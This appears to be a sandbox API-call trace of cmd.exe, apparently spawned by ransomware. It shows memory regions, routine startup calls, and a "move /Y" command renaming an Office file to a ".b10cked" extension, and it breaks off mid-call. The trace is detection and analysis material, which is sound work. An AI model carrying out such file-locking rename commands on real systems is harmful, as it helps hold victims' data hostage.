start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22057 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22058 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22059 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22060 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22061 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22062 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 22063 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 22064 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 333 os_tid = 0x7f8 [0159.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc6c | out: lpSystemTimeAsFileTime=0x12fc6c*(dwLowDateTime=0x99132b40, dwHighDateTime=0x1d440a9)) [0159.857] GetCurrentProcessId () returned 0x7ac [0159.857] GetCurrentThreadId () returned 0x7f8 [0159.857] GetTickCount () returned 0x30c6e [0159.857] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc64 | out: lpPerformanceCount=0x12fc64*=21664607724) returned 1 [0159.858] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0159.858] __set_app_type (_Type=0x1) [0159.858] __p__fmode () returned 0x76b331f4 [0159.858] __p__commode () returned 0x76b331fc [0159.858] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0159.858] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0159.858] GetCurrentThreadId () returned 0x7f8 [0159.858] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7f8) returned 0x38 [0159.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.858] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0159.858] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.859] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0159.859] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fbfc | out: phkResult=0x12fbfc*=0x0) returned 0x2 [0159.859] VirtualQuery (in: lpAddress=0x12fc33, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.859] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fbcc, dwLength=0x1c | out: lpBuffer=0x12fbcc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.859] GetConsoleOutputCP () returned 0x1b5 [0159.859] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.859] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0159.859] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.859] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0159.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.860] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.860] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.860] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.860] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.860] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.860] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0159.860] GetEnvironmentStringsW () returned 0x330210* [0159.861] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0159.861] GetEnvironmentStringsW () returned 0x330210* [0159.861] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0159.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb6c | out: phkResult=0x12eb6c*=0x40) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0xa0, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x0, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegCloseKey (hKey=0x40) returned 0x0 [0159.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb6c | out: phkResult=0x12eb6c*=0x40) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x40, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x1, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.861] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x0, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.862] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x9, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.862] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x4, lpData=0x12eb78*=0x9, lpcbData=0x12eb70*=0x4) returned 0x0 [0159.862] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb74, lpData=0x12eb78, lpcbData=0x12eb70*=0x1000 | out: lpType=0x12eb74*=0x0, lpData=0x12eb78*=0x9, lpcbData=0x12eb70*=0x1000) returned 0x2 [0159.862] RegCloseKey (hKey=0x40) returned 0x0 [0159.862] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886382 [0159.862] srand (_Seed=0x5b886382) [0159.862] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"" [0159.862] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked\"" [0159.862] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.863] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0159.863] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.863] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.863] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0159.863] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0159.863] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0159.863] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0159.863] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0159.863] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0159.863] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0159.863] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0159.863] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0159.864] GetEnvironmentStringsW () returned 0x332360* [0159.864] FreeEnvironmentStringsW (penv=0x332360) returned 1 [0159.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0159.864] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0159.864] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0159.864] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0159.864] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0159.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0159.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0159.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0159.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f938 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.864] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f938, lpFilePart=0x12f934 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f934*="Desktop") returned 0x18 [0159.864] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.864] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f6b4 | out: lpFindFileData=0x12f6b4) returned 0x3309f0 [0159.865] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0159.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f6b4 | out: lpFindFileData=0x12f6b4) returned 0x3309f0 [0159.865] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0159.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f6b4 | out: lpFindFileData=0x12f6b4) returned 0x3309f0 [0159.865] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0159.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.865] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0159.865] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0159.865] GetEnvironmentStringsW () returned 0x330210* [0159.865] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0159.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.866] GetConsoleOutputCP () returned 0x1b5 [0159.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.866] GetUserDefaultLCID () returned 0x409 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fa78, cchData=128 | out: lpLCData="0") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fa78, cchData=128 | out: lpLCData="0") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fa78, cchData=128 | out: lpLCData="1") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0159.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0159.867] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0159.868] GetConsoleTitleW (in: lpConsoleTitle=0x320930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0159.869] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0159.869] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0159.869] _wcsicmp (_String1="move", _String2=")") returned 68 [0159.870] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0159.870] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0159.870] _wcsicmp (_String1="IF", _String2="move") returned -4 [0159.870] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0159.870] _wcsicmp (_String1="REM", _String2="move") returned 5 [0159.870] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0159.874] GetConsoleTitleW (in: lpConsoleTitle=0x12f770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.874] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0159.874] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0159.874] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0159.874] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0159.874] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0159.874] _wcsicmp (_String1="move", _String2="CD") returned 10 [0159.874] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0159.874] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0159.874] _wcsicmp (_String1="move", _String2="REN") returned -5 [0159.874] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0159.874] _wcsicmp (_String1="move", _String2="SET") returned -6 [0159.874] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0159.874] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0159.874] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0159.874] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0159.875] _wcsicmp (_String1="move", _String2="MD") returned 11 [0159.875] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0159.875] _wcsicmp (_String1="move", _String2="RD") returned -5 [0159.875] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0159.875] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0159.875] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0159.875] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0159.875] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0159.875] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0159.875] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0159.875] _wcsicmp (_String1="move", _String2="VER") returned -9 [0159.875] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0159.875] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0159.875] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0159.875] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0159.875] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0159.875] _wcsicmp (_String1="move", _String2="START") returned -6 [0159.875] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0159.875] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0159.875] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0159.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.877] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f52c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f524, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f524*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0159.877] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0159.878] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0159.879] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0159.879] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0159.879] _wcsicmp (_String1="VISBRR~1.TRX", _String2="..") returned 72 [0159.879] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrr~1.trx")) returned 0x2020 [0159.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.879] SetErrorMode (uMode=0x0) returned 0x0 [0159.879] SetErrorMode (uMode=0x1) returned 0x0 [0159.879] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x12eeb4, lpFilePart=0x12ee9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", lpFilePart=0x12ee9c*="VISBRR~1.TRX") returned 0x3c [0159.879] SetErrorMode (uMode=0x0) returned 0x1 [0159.879] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0159.879] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0159.880] _wcsicmp (_String1="VISBRR~1.TRX", _String2="..") returned 72 [0159.880] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrr~1.trx")) returned 0x2020 [0159.880] SetErrorMode (uMode=0x0) returned 0x0 [0159.880] SetErrorMode (uMode=0x1) returned 0x0 [0159.880] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x12f330, lpFilePart=0x12f0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", lpFilePart=0x12f0c8*="VISBRR~1.TRX") returned 0x3c [0159.880] SetErrorMode (uMode=0x0) returned 0x1 [0159.880] SetErrorMode (uMode=0x0) returned 0x0 [0159.880] SetErrorMode (uMode=0x1) returned 0x0 [0159.880] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12f538, lpFilePart=0x12f0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", 